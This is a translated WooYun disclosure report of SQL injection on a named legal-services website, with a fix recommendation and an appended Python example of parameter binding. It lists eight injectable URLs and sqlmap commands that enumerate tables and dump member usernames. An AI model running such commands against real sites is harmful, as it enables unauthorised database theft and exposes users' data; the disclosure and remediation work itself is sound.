
Vulnerability summary

Defect ID: wooyun-2015-0116987

Title: Multiple SQL injections on a legal-services website

Affected vendor: CNCERT (National Internet Emergency Center)

Author: 示云

Submitted: 2015-06-02 07:37

Fixed: 2015-07-20 18:16

Published: 2015-07-20 18:16

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 5

Status: handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-02: details sent to the vendor; awaiting the vendor's handling
2015-06-05: vendor confirmed; details visible to the vendor only
2015-06-15: details disclosed to core white hats and domain experts
2015-06-25: details disclosed to regular white hats
2015-07-05: details disclosed to intern white hats
2015-07-20: details disclosed to the public

Brief description:

Several pages are vulnerable to SQL injection: the SQL statements are built by concatenating unprocessed request parameters, which allows the entire database to be dumped.

Detailed description:

The following pages are vulnerable to SQL injection:
http://www.myfawu.com/product.php?type=
http://www.myfawu.com/other/focus.php?focusID=
http://www.myfawu.com/other/focus.php?page=1&focusID=
http://www.myfawu.com/news/cat.php?cat1=
http://www.myfawu.com/news/cat.php?cat1=&cat2=
http://www.myfawu.com/news/cat.php?cat1=&cat2=&cat3=
http://www.myfawu.com/news/industry_list.php?industryID=
http://www.myfawu.com/news/industry_list.php?industryID=

Proof of vulnerability:

python sqlmap.py -u http://www.myfawu.com/product.php?type=2 -D bbs --tables
Database: bbs
[103 tables]
python sqlmap.py -u http://www.myfawu.com/product.php?type=2 -D bbs -T bbs_members -C username --dump

Fix recommendation:

Validate the query parameters before they reach the SQL statement, and bind them as parameters instead of concatenating them.

Copyright notice: please credit 示云@乌云 when reposting.
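As an added illustration of the fix (example code, not from the report or the site; the product table and its rows are constructed), the concatenation pattern the report describes is shown beside a version that whitelists the numeric id and binds it as a parameter. All of the listed parameters (type, focusID, page, cat1..cat3, industryID) are numeric ids, so the same check applies to each.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the site's product table; not the real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER, type INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [(1, 1, "contract review"), (2, 2, "trademark filing"),
         (3, 2, "patent search"), (4, 3, "litigation")],
    )
    return conn


def query_unsafe(conn, type_param):
    # The pattern the report describes: the raw request parameter is
    # concatenated into the statement, so it can alter the WHERE clause.
    sql = "SELECT id, name FROM product WHERE type = " + type_param + " ORDER BY id"
    return conn.execute(sql).fetchall()


class BadParameter(ValueError):
    pass


def validate_id(value, max_len=10):
    # Whitelist check: the vulnerable parameters are all numeric identifiers,
    # so anything other than 1..max_len digits is rejected outright.
    if not re.fullmatch(r"[0-9]{1,%d}" % max_len, value):
        raise BadParameter("expected a numeric id, got %r" % value)
    return int(value)


def query_safe(conn, type_param):
    # Validate first, then bind: the value is passed to the driver as data
    # and never becomes part of the SQL text.
    type_id = validate_id(type_param)
    return conn.execute(
        "SELECT id, name FROM product WHERE type = ? ORDER BY id", (type_id,)
    ).fetchall()


def is_rejected(conn, type_param):
    # Helper for checking that a malformed parameter never reaches the database.
    try:
        query_safe(conn, type_param)
    except BadParameter:
        return True
    return False
```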


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-06-05 18:14

Vendor reply:

Latest status:

None yet

